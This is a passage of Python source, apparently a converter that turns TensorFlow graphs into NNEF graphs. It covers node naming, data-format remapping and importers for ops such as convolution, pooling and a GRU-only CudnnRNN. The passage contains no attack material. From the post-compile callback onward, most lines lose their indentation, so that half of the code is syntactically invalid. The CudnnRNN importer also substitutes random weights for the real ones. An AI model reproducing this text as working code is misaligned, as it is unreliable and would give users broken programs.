                    self.input_nodes[in_node_str] = "input"
                else:
                    self.input_nodes[in_node_str] = "input" + str(i)
                    i += 1
        else:
            input_nodes = []
            for tfnode in self.graph.node:
                if hasattr(tfnode, 'op'):
                    if tfnode.op == 'Placeholder':
                        input_nodes.append(tfnode.name)
            if len(input_nodes) == 1:
                self.input_nodes[input_nodes[0]] = "input"
            else:
                for i in range(len(input_nodes)):
                    self.input_nodes[input_nodes[i]] = "input" + str(i+1)

        i = 1
        if output_nodes is not None:
            for out_node_str in output_nodes.split(','):
                if len(output_nodes.split(',')) == 1:
                    self.output_nodes[out_node_str] = "output"
                else:
                    self.output_nodes[out_node_str] = "output" + str(i)
                    i += 1
        else:
            # Unable to use single loop for case of out of order nodes (MobileNetV2 from Model Zoo)
            output_nodes = []
            for tfnode in self.graph.node:
                if hasattr(tfnode, 'op'):
                    output_nodes.append(tfnode.name)
            for tfnode in self.graph.node:
                if hasattr(tfnode, 'op'):
                    for input_val in tfnode.input:
                        if input_val in output_nodes:
                            output_nodes.remove(input_val)
            if len(output_nodes) == 1:
                self.output_nodes[output_nodes[0]] = "output"
            else:
                for i in range(len(output_nodes)):
                    self.output_nodes[output_nodes[i]] = "output" + str(i+1)

    def run(self):
        self.nxgraph = nx.OrderedDiGraph()
        self.create_nodes()
        self.log_total_conversions()
        input_nodes = self.get_input_nodes()
        output_nodes = self.get_output_nodes()
        return NNEFGraph(os.path.basename(self.input_model).split('.')[0],
                         input_nodes,
                         output_nodes,
                         pre_compile_callback=self.pre_compile_callback,
                         post_compile_callback=self.post_compile_callback,
                         node_pool=self.node_pool)

    def get_input_nodes(self):
        input_node_list = []
        if 'input' in self.node_pool.keys():
            input_node_list.append(self.get_node_from_pool_by_name('input', get_orig=True))
        else:
            i = 1
            while 'input' + str(i) in self.node_pool.keys():
                input_node_list.append(self.get_node_from_pool_by_name('input'+str(i), get_orig=True))
                i += 1
        return input_node_list

    def get_output_nodes(self):
        output_node_list = []
        if 'output' in self.node_pool.keys():
            output_node_list.append(self.get_node_from_pool_by_name('output', get_orig=True))
        else:
            i = 1
            while 'output' + str(i) in self.node_pool.keys():
                output_node_list.append(self.get_node_from_pool_by_name('output' + str(i), get_orig=True))
                i += 1
        return output_node_list

    def create_nodes(self):
        for tfnode in self.graph.node:
            self.total += 1
            if self.start_format == None and tfnode.attr['data_format'].s != b'':
                self.start_format = tfnode.attr['data_format'].s.decode('ascii')
            if hasattr(tfnode, 'op'):
                node_op = tfnode.op
                if hasattr(self, "import_" + node_op):
                    func = getattr(self, "import_" + node_op)
                    nnef_node, tf_inputs, tf_attrs = func(tfnode)
                    self.successful += 1
                    if nnef_node is not None:
                        self.add_node_to_pool(nnef_node, tfnode, tf_inputs, tf_attrs)
                else:
                    self.import_UNKNOWN(tfnode)
            else:
                self.logger.error("Node doesn't have op attr.: %s"%(tfnode.name))

    def add_node_to_pool(self, nnef_node, tfnode, tf_inputs, tf_attrs):
        if nnef_node.name not in self.node_pool.keys():
            self.log_tf_node_info(tfnode, tf_inputs, tf_attrs)
            self.node_pool[nnef_node.name] = nnef_node

    def remove_node_from_pool(self, nnef_node):
        self.log_removing_node(nnef_node)
        self.node_pool.pop(nnef_node.name, None)

    def get_node_from_pool(self, tfnode, idx):
        node_name = self.gen_node_name(self.get_tfnode_input(tfnode, idx))
        # Handles cases where nodes are out of order within Protocol Buffer
        try:
            nnef_node = self.get_node_from_pool_by_name(node_name)
        except:
            for tfnode in self.graph.node:
                if self.gen_node_name(tfnode.name) == node_name:
                    if hasattr(tfnode, 'op'):
                        node_op = tfnode.op
                        if hasattr(self, "import_" + node_op):
                            func = getattr(self, "import_" + node_op)
                            nnef_node, tf_inputs, tf_attrs = func(tfnode)
                            if nnef_node is not None:
                                self.add_node_to_pool(nnef_node, tfnode, tf_inputs, tf_attrs)
                    break
            nnef_node = self.get_node_from_pool_by_name(node_name)
        if nnef_node.op == 'idn':
            nnef_node = self.get_node_from_pool_by_name(nnef_node.name).parameters['x']
        return nnef_node

    def get_node_from_pool_by_name(self, node_name, get_orig=False):
        if node_name in self.name_convs and not get_orig:
            node_name = self.name_convs[node_name]
        assert node_name in self.node_pool.keys(), "Node pool doesn't contain required node: %s" % node_name
        return self.node_pool[node_name]

    def shape_nx_graph(self, nx_graph):
        remove_nodes = []
        if self.start_format is None:
            for nnef_node_name in nx_graph:
                if nx_graph.node[nnef_node_name]['node'].op == 'pad':
                    remove_nodes.append(nnef_node_name)
            for nnef_node_name in remove_nodes:
                nx_graph.remove_node(nnef_node_name)
            return
        else:
            nnef_format = 'NC...'
            if len(self.start_format) != self.start_length:
                if(self.start_format == 'NHWC' and self.start_length == 3):
                    self.start_format = 'NHC'
                elif(self.start_format == 'NCHW' and self.start_length == 3):
                    self.start_format = 'NCH'
                else:
                    raise ValueError("Issue with compatibility of start_format : " + self.start_format +
                                     " and start_length : " + str(self.start_length))
            current_format = self.start_format

            indexes = list(range(len(self.start_format)))
            mapping = {}
            for i in range(len(self.start_format)):
                if self.start_format[i] in nnef_format:
                    index = nnef_format.find(self.start_format[i])
                    indexes.pop(indexes.index(index))
                    mapping[i] = index
            for i in range(len(self.start_format)):
                if i not in mapping:
                    mapping[i] = indexes[0]
                    indexes.pop(0)

            for nnef_node_name in nx_graph:
                if nx_graph.node[nnef_node_name]['node'].op == 'pad':
                    remove_nodes.append(nnef_node_name)
                    continue
                nnef_node = nx_graph.node[nnef_node_name]['node']
                if nnef_node.op not in ['variable', 'constant', 'reshape']:
                    if '_data_format' in nnef_node.parameters and nnef_node.parameters['_data_format'] != '':
                        self.current_format = nnef_node.parameters['_data_format']
                    if 'shape' in nnef_node.parameters and current_format is not None:
                        nnef_node.parameters['shape'] = convert_format(nnef_node.parameters['shape'], current_format, nnef_format)
                    if nnef_node.op == 'transpose' and current_format is not None:
                        new_format = ''
                        for i in nnef_node.parameters['axes']:
                            new_format += current_format[i]
                        new_perms = list(range(len(nnef_node.parameters['axes'])))
                        nnef_node.parameters['axes'] = convert_format(new_perms, nnef_format, new_format)
                        current_format = new_format
                    if 'axes' in nnef_node.parameters and current_format is not None and nnef_node.op not in ['softmax', 'transpose']:
                        new_axes = []
                        for i in nnef_node.parameters['axes']:
                            new_axes.append(mapping[i])
                        nnef_node.parameters['axes'] = new_axes
                    if 'axis' in nnef_node.parameters and current_format is not None:
                        new_axis = mapping[nnef_node.parameters['axis']]
                        nnef_node.parameters['axis'] = new_axis
                    if nnef_node.output_shape is not None and \
                       len(nnef_node.output_shape) == len(self.start_format) and \
                       current_format is not None:
                        nnef_node.output_shape = convert_format(nnef_node.output_shape, current_format, nnef_format)
                elif nnef_node.op == 'reshape':
                    if not nnef_node.parameters['_maintain_format']:
                        current_format = None
            nx_graph.remove_nodes_from(remove_nodes)

    # Helper function to convert node names to lower case and remove illegal characters ('/', ...)
    def gen_node_name(self, node_name):
        try:
            if isinstance(node_name, unicode):
                node_name = node_name.encode('ascii')
        except NameError:
            node_name = node_name
        assert isinstance(node_name, str), "self.gen_node_name: node_name is not a str"

        if node_name in self.input_nodes:
            node_name = self.input_nodes[node_name]
            return node_name
        if node_name in self.output_nodes:
            node_name = self.output_nodes[node_name]
            return node_name

        name = node_name.lower()
        if name[-5:] == '/read':
            name = name[:-5]
        name = name.replace('/', '_')
        name = name.replace(':', '_')
        return name

    def get_tfnode_input(self, tfnode, idx):
        assert idx < len(tfnode.input), "Bad index for accessing Tensorflow's op input %s"%idx
        return tfnode.input[idx]
    '''
    Called by the NNEF graph when all nodes are there, with no edge yet.
    '''
    def pre_compile_callback(self, nx_graph):
        # Cleaning up "idn" nodes
        remove_nodes = []
        for nnef_node_name in nx_graph:
            if nx_graph.node[nnef_node_name]['node'].op == 'idn':  # was `is 'idn'`: identity check on a string, not equality
                remove_nodes.append(nx_graph.node[nnef_node_name]['node'].name)
        nx_graph.remove_nodes_from(remove_nodes)
        return
'''
Called by the NNEF graph after edges are connected.
'''
def post_compile_callback(self, nx_graph):
self.shape_nx_graph(nx_graph)
@staticmethod
def nnef_padding(padding, rank):
return [] if padding.upper() == b'SAME' else [(0, 0)] * rank
@staticmethod
def tensor_shape_to_list(shapes):
return [dim.size for dim in shapes.dim]
def new_get_attr(self, tfnode, attribute, *args):
if attribute == 'ksize' and tfnode.attr['ksize'].list.i is not None:
ksize = tfnode.attr[attribute].list.i
ksize = [int(v) for v in ksize]
ksize = convert_format(ksize, args[1], 'NC...')
return ksize
elif attribute == 'padding' and tfnode.attr[attribute].s is not None:
value = tfnode.attr[attribute].s
rank = args[0] if args[0] is not None else 4
padding = self.nnef_padding(value, rank)
return padding
elif attribute == 'strides' and tfnode.attr['strides'].list.i is not None:
strides = tfnode.attr[attribute].list.i
strides = [int(v) for v in strides]
strides = convert_format(strides, args[1], 'NC...')
return strides
elif attribute == 'dilations' and tfnode.attr['dilations'].list.i is not None:
dilations = tfnode.attr['dilations'].list.i
dilations = [int(v) for v in dilations]
if dilations:
dilations = convert_format(dilations, args[1], 'NC...')
return dilations
elif attribute == 'alpha' and tfnode.attr['alpha'].f is not None:
value = tfnode.attr['alpha'].f
return value
elif attribute == 'beta' and tfnode.attr['beta'].f is not None:
value = tfnode.attr['beta'].f
return value
elif attribute == 'bias' and tfnode.attr['bias'].f is not None:
value = tfnode.attr['bias'].f
return value
elif attribute == 'transpose_a':
value = self._get_attr(tfnode, attribute)
return value
elif attribute == 'transpose_b':
value = self._get_attr(tfnode, attribute)
return value
elif attribute == 'epsilon':
value = tfnode.attr['epsilon'].f
return value
else:
    return self._get_attr(tfnode, attribute)
def _get_attr(self, tfnode, name, default_value=None):
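# Resolves the AttrValue oneof generically. Illustrative (hypothetical)
# cases: a bytes field b'NHWC' is returned as the str 'NHWC'; a ListValue
# of ints such as [1, 2, 2, 1] is returned as a plain Python list.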
if name in tfnode.attr:
attr = tfnode.attr[name]
field = attr.WhichOneof('value')
val = getattr(attr, field) if field else default_value
if isinstance(val, attr_value_pb2.AttrValue.ListValue):
return list(val.ListFields()[0][1])
else:
return val.decode('utf-8') if isinstance(val, bytes) else val
else:
return default_value
def get_numpy_from_tf_tensor(self, tf_tensor):
if tf_tensor.dtype == 3:
    nnef_dtype = np.int32
elif tf_tensor.dtype == 1:
    nnef_dtype = np.float32
else:
    raise ValueError("Unsupported tf tensor dtype: %s" % tf_tensor.dtype)
tf_shape = self.tensor_shape_to_list(tf_tensor.tensor_shape)
assert tf_shape, "tf_shape is empty!"
if (len(tf_shape) == 1 and tf_shape[0] != 1):
tf_shape = [1, tf_shape[0]]
return tf_tensor.tensor_content, nnef_dtype, tf_shape
def define_elementwise_binary_output_shape(self, nnef_node_x, nnef_node_y):
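# The operand with more elements wins, which approximates TF broadcasting
# for the patterns seen here: e.g. x [1, 64, 56, 56] vs. y [1, 64, 1, 1]
# (hypothetical shapes) yields [1, 64, 56, 56].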
y_size = x_size = 1
for i in nnef_node_x.output_shape:
x_size *= i
for i in nnef_node_y.output_shape:
y_size *= i
if x_size >= y_size:
output_shape = nnef_node_x.output_shape[:]
else:
output_shape = nnef_node_y.output_shape[:]
return output_shape
@staticmethod
def _get_scopes(layer_name):
return layer_name.split('/')
def import_UNKNOWN(self, tfnode):
self.log_unsupported_nodes(tfnode)
return
def import_NoOp(self, tfnode):
return None, None, None, None
def import_Const(self, tfnode):
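# Two paths, sketched with hypothetical tensors: a const with empty
# tensor_content becomes a node.Constant (scalars are padded out to shape
# [1, 1]), while a filled tensor_content becomes a node.Variable backed by
# the raw tensor bytes.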
if tfnode.attr['value'].tensor.tensor_content == b'':
shape = self.tensor_shape_to_list(tfnode.attr['value'].tensor.tensor_shape)
if len(shape) == 1:
if shape[0] == 0:
nnef_node = node.Constant(value=[],
shape=shape,
_uid=self.gen_node_name(tfnode.name),
_np_dtype=None,
_output_shape=shape)
return nnef_node, {}, {}
else:
shape = [1] + shape
value = None
if tfnode.attr['value'].tensor.dtype == 3:
value = [float(tfnode.attr['value'].tensor.int_val[0])]
np_dtype = np.int32
elif tfnode.attr['value'].tensor.dtype == 1:
value = [float(tfnode.attr['value'].tensor.float_val[0])]
np_dtype = np.float32
elif tfnode.attr['value'].tensor.dtype == 10:
raise ValueError("Type logical is not currently supported within NNEF as a constant or variable")
else:
raise ValueError("Type " + str(tfnode.attr['value'].tensor.dtype) + " is not currently supported")
if shape == []:
shape = [1, 1]
nnef_node = node.Constant(value=value,
shape=shape,
_uid=self.gen_node_name(tfnode.name),
_np_dtype=np_dtype,
_output_shape=shape)
inputs = {}
attrs = {'value': value, 'shape':shape}
else:
np_tensor, np_dtype, shape = self.get_numpy_from_tf_tensor(tfnode.attr['value'].tensor)
try:
if isinstance(tfnode.name, unicode):
label = tfnode.name.encode('ascii')
else:
label = tfnode.name
except NameError:
label = tfnode.name
nnef_node = node.Variable(label=label,
shape=shape,
_np_dtype=np_dtype,
_np_tensor=np_tensor,
_output_shape=shape,
_uid=self.gen_node_name(tfnode.name))
inputs = {}
attrs = {'label': tfnode.name, 'shape':shape}
return nnef_node, inputs, attrs
def import_Abs(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Abs(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Add(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Add(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_AvgPool(self, tfnode):
tf_inputs = {'input':0}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 4, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
padding.append((pad_array[0][0], pad_array[0][1]))
padding.append((pad_array[-1][0], pad_array[-1][1]))
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
    for i in range(len(pad_array)):
        padding.append((pad_array[i][0], pad_array[i][1]))
sizes = self.new_get_attr(tfnode, 'ksize', None, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = [1, 1, 1, 1]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
#Calculate output shape
output_shape = len(in_shape) * [0]
for i in range(len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i])
else:
fd = (sizes[i] - 1) * dilations[i] + 1
padding_add = padding[i][0] + padding[i][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
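# Worked example of the formulas above (hypothetical VALID pool): NHWC
# input [1, 4, 4, 3], ksize/strides [1, 1, 2, 2] in NC... order, so
# in_shape (NCHW) is [1, 3, 4, 4]; per spatial dim:
#   fd = (2 - 1) * 1 + 1 = 2
#   out = floor((4 + 0 - 2) / 2) + 1 = 2
# giving NCHW [1, 3, 2, 2], converted back to NHWC as [1, 2, 2, 3].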
nnef_node = node.AvgPool(input=nnef_node_input,
size=sizes,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding':padding, 'ksize':sizes, 'strides':strides}
return nnef_node, tf_inputs, attrs
def import_BiasAdd(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Add(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Ceil(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Ceil(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_ConcatV2(self, tfnode):
tf_inputs = {}
attrs = {}
nnef_nodes = []
for i in range(len(tfnode.input)-1):
nnef_nodes.append(self.get_node_from_pool(tfnode, i))
tf_inputs['value_' + str(i)] = i
nnef_node_axis = self.get_node_from_pool(tfnode, len(tfnode.input)-1)
tf_inputs['value_' + str(len(tfnode.input)-1)] = len(tfnode.input)-1
axis = int(nnef_node_axis.parameters['value'][0])
self.remove_node_from_pool(nnef_node_axis)
output_shape = nnef_nodes[0].output_shape[:]
for nnef_node in nnef_nodes[1:]:
output_shape[axis] += nnef_node.output_shape[axis]
nnef_node = node.Concat(values=nnef_nodes,
axis=axis,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Conv2D(self, tfnode):
tf_inputs = {'input': 0, 'filter':1}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 2, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [3, 2, 0, 1])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
nnef_node_filter.output_shape = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'HWNC', 'CNHW')
nnef_node_filter.parameters['shape'] = new_shape
nnef_node_filter.output_shape = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[0]
for i in range(2, len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i-2])
else:
fd = (new_shape[i] - 1) * dilations[i-2] + 1
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i-2]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
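# Worked example (hypothetical VALID 3x3 conv): NHWC input [1, 224, 224, 3]
# (NCHW [1, 3, 224, 224]), filter transposed to [64, 3, 3, 3], strides
# [2, 2], dilations [1, 1]:
#   fd = (3 - 1) * 1 + 1 = 3
#   out = floor((224 + 0 - 3) / 2) + 1 = 111
# giving NCHW [1, 64, 111, 111] -> NHWC [1, 111, 111, 64].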
nnef_node = node.Conv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Conv3D(self, tfnode):
tf_inputs = {'input': 0, 'filter':1}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 3, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NDHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCDHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [4, 3, 0, 1, 2])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'DHWNC', 'CNDHW')
nnef_node_filter.parameters['shape'] = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[0]
for i in range(2, len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i-2])
else:
fd = (new_shape[i] - 1) * dilations[i-2] + 1
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i-2]) + 1
output_shape = convert_format(output_shape, 'NCDHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Conv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Conv2DBackpropInput(self, tfnode):
tf_inputs = {'input': 2, 'filter':1}
output_node = self.get_node_from_pool(tfnode, 0)
self.remove_node_from_pool(output_node)
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 2, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [3, 2, 0, 1])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'HWNC', 'CNHW')
nnef_node_filter.parameters['shape'] = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[1]
for i in range(2, len(in_shape)):
fd = (new_shape[i] - 1) * dilations[i-2] + 1
if padding == []:
padding_add = new_shape[i] - 2
else:
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = (in_shape[i] - 1)*strides[i-2] + fd - padding_add
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
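# Worked example (hypothetical 2x deconv): NCHW input [1, 64, 56, 56],
# filter new_shape [64, 32, 2, 2], strides [2, 2], SAME (padding == []):
#   fd = (2 - 1) * 1 + 1 = 2, padding_add = 2 - 2 = 0
#   out = (56 - 1) * 2 + 2 - 0 = 112
# so spatial dims double and output channels come from new_shape[1] = 32.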
nnef_node = node.Deconv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Conv3DBackpropInputV2(self, tfnode):
tf_inputs = {'input': 2, 'filter':1}
output_node = self.get_node_from_pool(tfnode, 0)
self.remove_node_from_pool(output_node)
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', 3, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
strides = strides[2:]
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
dilations = dilations[2:]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCDHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = np.transpose(filter_tdf.get_data().get_array()[0], [4, 3, 0, 1, 2])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
elif nnef_node_filter.op == 'reshape':
current_shape = nnef_node_filter.parameters['shape'][:]
new_shape = convert_format(current_shape, 'DHWNC', 'CNDHW')
nnef_node_filter.parameters['shape'] = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[1]
for i in range(2, len(in_shape)):
fd = (new_shape[i] - 1) * dilations[i-2] + 1
if padding == []:
padding_add = new_shape[i] - 2
else:
padding_add = padding[i-2][0] + padding[i-2][1]
output_shape[i] = (in_shape[i] - 1)*strides[i-2] + fd - padding_add
output_shape = convert_format(output_shape, 'NCDHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Deconv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_CudnnRNN(self, tfnode):
assert tfnode.attr['rnn_mode'].s.decode('ascii') == 'gru', "CudnnRNN import only supports GRU"
tf_inputs = {'input': 0 }
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
shape = [nnef_node_input.output_shape[0], nnef_node_input.output_shape[2]]
nnef_node_reshape = node.Reshape(input=nnef_node_input,
shape=shape,
_uid=self.gen_node_name(tfnode.name) + '_reshape',
_output_shape=shape,
_maintain_format=False)
self.node_pool[nnef_node_reshape.name] = nnef_node_reshape
# NOTE: CudnnRNN packs its weights into an opaque parameter blob, so the
# hidden size is hard-coded here and the z/r/s filters and biases below
# are freshly random-initialized placeholders rather than recovered weights.
channels = 512
scope = tfnode.name
h = node.Variable(shape=[shape[0], channels],
label=scope + '/h',
_uid=self.gen_node_name(tfnode.name) + '_h',
_output_shape=[shape[0], channels],
_np_tensor=np.random.randn(*[shape[0], channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
h.tensor_data_file.write_to_disk(h.parameters['label'] + '.dat')
z_filter = node.Variable(shape=[channels, shape[1]+channels],
label=scope + '/z/filter',
_uid=self.gen_node_name(tfnode.name) + '_z_filter',
_output_shape=[channels, shape[1]+channels],
_np_tensor=np.random.randn(*[channels, shape[1]+channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
z_filter.tensor_data_file.write_to_disk(z_filter.parameters['label'] + '.dat')
r_filter = node.Variable(shape=[channels, shape[1]+channels],
label=scope + '/r/filter',
